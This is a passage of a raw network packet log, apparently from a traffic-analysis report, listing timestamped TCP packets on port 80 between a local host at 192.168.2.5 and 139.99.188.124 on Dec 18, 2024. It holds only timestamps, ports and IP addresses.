                                                                    Dec 18, 2024 09:13:15.148861885 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.148987055 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.149686098 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.149734974 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.149796963 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.150619030 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.150643110 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.150671959 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.151509047 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.151552916 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.151587963 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.151608944 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.152467966 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.152520895 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.152616978 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.153315067 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.153362036 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.153392076 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.154232979 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.154284000 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.154426098 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.155189991 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.155245066 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.155324936 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.156071901 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.156121969 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.156393051 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.157133102 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.157187939 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.157229900 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.157865047 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.157922983 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.157952070 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.158934116 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.158982038 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.159020901 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.159692049 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.159744024 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.159785986 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.160660982 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.160672903 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.160712957 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.161525965 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.161575079 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.162245989 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.162517071 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.162571907 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.162619114 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.163391113 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.163451910 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.163506985 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.164321899 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.164377928 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.164439917 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.305958033 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.306022882 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.306025028 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.306265116 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.306344032 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.306364059 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.307090044 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.307148933 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.307380915 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.307554960 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.307836056 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.308182955 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.308306932 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.308535099 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.308980942 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.309089899 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.309135914 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.309792042 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.309890985 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.309941053 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.310631037 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.310862064 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.310910940 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.311424971 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.311527967 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.311575890 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.312227011 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.312351942 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.312405109 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.313021898 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.313133955 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.313211918 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.313810110 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.313966990 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.314016104 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.314629078 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.314778090 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.314826965 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.315418959 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.315571070 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.315841913 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.316241026 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.316385984 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.316436052 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.317054987 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.317169905 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.317282915 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.317864895 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.317981958 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.318054914 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.318761110 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.318836927 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.318885088 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.319463015 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.319618940 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.319668055 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.320255041 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.320416927 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.320547104 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.321059942 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.321113110 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.321228981 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.321876049 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.321974039 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.322024107 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.322679996 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.322812080 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.322870016 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.323481083 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.323605061 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.323746920 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.324337959 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.324424028 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.324512005 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.325136900 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.325352907 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.325587988 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.325896978 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.325972080 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.326016903 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.326709986 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.326936960 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.327029943 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.327538967 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.327646971 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.327702999 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.328326941 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.328500032 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.328547001 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.329111099 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.329262018 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.329312086 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.329925060 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.330025911 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.330073118 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.330725908 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.330836058 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.330928087 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.331598043 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.331712008 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.331758022 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.332345009 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.332561970 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.332612038 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.333163023 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.333292007 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.333343029 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.333944082 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.334085941 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.334146023 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.334747076 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.334877968 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.334923983 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.335566044 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.335692883 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.335740089 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.336484909 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.336507082 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.336611032 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.337167025 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.337272882 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.337321043 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.337971926 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.338061094 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.338160992 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.338769913 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.338884115 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.339070082 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.339561939 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.339616060 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.339664936 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.340379000 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.340516090 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.340569019 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.341182947 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.341346025 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.341459036 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.342025995 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.342108965 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.342277050 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.342794895 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.342906952 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.342948914 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.343611002 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.343745947 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.343945026 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.344377995 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.344522953 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.344559908 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.345184088 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.345295906 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.345350981 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.345992088 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.346146107 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.346191883 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.346812010 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.346916914 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.346961975 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.347635984 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.347718954 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.347765923 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.497073889 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.497157097 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.497205973 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.497322083 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.497483015 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.497525930 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.497606993 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.498352051 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.498400927 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.498444080 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.499083996 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.499139071 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.499186039 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.500016928 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.500082016 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.500108957 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.500787020 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.500842094 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.500878096 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.501542091 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.501632929 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.501697063 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.502399921 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.502448082 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.502527952 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.503189087 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.503247023 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.503269911 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.503957987 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.504072905 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.504101038 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.504726887 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.504898071 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.504942894 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.505548000 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.505640984 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.505683899 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.506330013 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.506382942 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.506443024 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.507128954 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.507181883 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.507241964 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.507944107 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.508007050 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.508052111 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.508740902 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.508841991 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.508897066 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.509557962 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.509617090 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.509654999 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.510375023 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.510418892 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.510458946 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.511157990 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.511203051 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.511250973 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.511986971 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.512077093 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.512078047 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.512772083 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.512818098 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.512876034 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.513601065 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.513649940 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.513691902 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.514389992 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.514456987 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.514484882 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.515202045 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.515247107 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.515295982 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.515996933 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.516050100 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.516103983 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.516825914 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.516874075 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.516885042 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.517608881 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.517721891 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.517729044 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.518435955 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.518520117 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.518573046 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.519212008 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.519257069 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.519301891 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.520030022 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.520118952 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.520176888 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.520832062 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.520879984 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.520948887 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.521678925 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.521753073 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.521805048 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.556284904 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.675843000 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.675916910 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.675972939 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.676233053 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.676379919 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.676429033 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.677021027 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.677145004 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.677198887 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.677846909 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.678011894 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.678066015 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.678673983 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.678772926 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.679430008 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.679445982 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.679562092 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.679696083 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.694267035 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.813853025 CET8049716139.99.188.124192.168.2.5
